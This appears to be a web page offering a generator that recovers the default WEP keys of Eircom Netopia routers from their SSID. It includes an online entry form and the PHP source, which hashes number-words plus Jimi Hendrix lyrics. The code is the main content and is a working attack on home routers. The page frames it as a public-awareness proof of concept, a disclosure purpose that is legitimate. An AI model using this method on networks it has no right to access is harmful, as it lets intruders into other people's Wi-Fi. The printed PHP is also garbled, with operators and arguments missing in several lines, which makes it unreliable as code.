Eircom Netopia WEP Key Generator / DESSID

Some time prior to January 2007 Eircom had some clueless muppet come up with a method of generating random keys to secure customers Wi-Fi access points. It may surprise you to know that generating truly random numbers is not a trivial undertaking. Never fear – you aren’t expected to know. However an Internet Service Provider (ISP) should.

The upshot of it is that there are (several years later) still vunerable routers out there.

This page is published to raise public awareness and to highlight the issue. All the material (including all the code) that this page is based on is in the public domain.

It is not to be used for anything illegal. Read the blog post on SeeIT.org here.

Enter the Eircom SSID here (just the numbers will do)


This is a proof of concept. It will work as long as the default Eircom generated WEP key has not been changed.
Credits:
• Originally derived from http://h1.ripway.com/kevindevine/wep_key.html (Archive.org version here)
• This PHP script was adapted as an academic excercise from Alex Bacik’s Perl version – http://www.bacik.ie/eircomwep/
• Explanation of algorithm by Alex on http://www.bacik.ie/eircomwep/howto.html

Want the PHP code?

<?php
    
/**
     * Get the WEP keys for a given eircom ssid
     *
     * @param the SSID of the access point "eircom1234 5678"
     * @return    array the four WEP keys
     */
    
private function _get_key$ssid ) {
        
        
// remove text, spaces, convert to integer...
        
$ssid intval(str_replace(array('eircom',' '), ''$ssid));
        
        
// convert to DEC
        
$dec_ssid base_convert$ssid 10);
        
        
// xor with 0x000fcc / 4044 to get the mac address 
        
$mac = ($dec_ssid 4044);
        
        
// Add this number to 0x010000000 or 16777216 to get serial
        
$serial $mac 16777216;
        
        
// convert numeric $serial to words. i.e '123' => 'OneTwoThree
        
$numbers = array('Zero''One''Two''Three''Four''Five''Six''Seven''Eight''Nine');
        
$characters str_split($serial);
        
        
$plaintext '';
        foreach (
$characters as $char) {
            
$plaintext .= $numbers["$char"];
        }
        
        
// Append some text - "Third Stone From The Sun" by Jimi Hendrix
        // (Reproduced without Jimi Hendrix permission!)
        
$lyrics = array("Although your world wonders me, "
                      
"with your superior cackling hen,",
                      
"Your people I do not understand,",
                      
"So to you I shall put an end and",
                      
"You'll never hear surf music aga",
                      
"Strange beautiful grassy green, ",
                      
"With your majestic silver seas, ",
                      
"Your mysterious mountains I wish");
        
$appended '';
        for ( 
$x=$x<=$x++ ) {
            
$appended[$x] = $plaintext $lyrics[$x];
        }
        
        
// Perform SHA-1 on each line and concatenate
        
$ciphertext"";
        for ( 
$x=$x<=$x++ ) {
          
$ciphertext .= sha1($appended[$x]);  
        }
        
        
// Break it up into 26-bit portions to give you the four WEP keys
        
$cipherportion = array();
        
$cipherportion[] = substr ($ciphertext026);
        
$cipherportion[] = substr ($ciphertext2626);
        
$cipherportion[] = substr ($ciphertext5226);
        
$cipherportion[] = substr ($ciphertext7826);
    
        
// all done
        
return $cipherportion;
        
    }
    
?>

Want to comment?

Go to the blog post for comments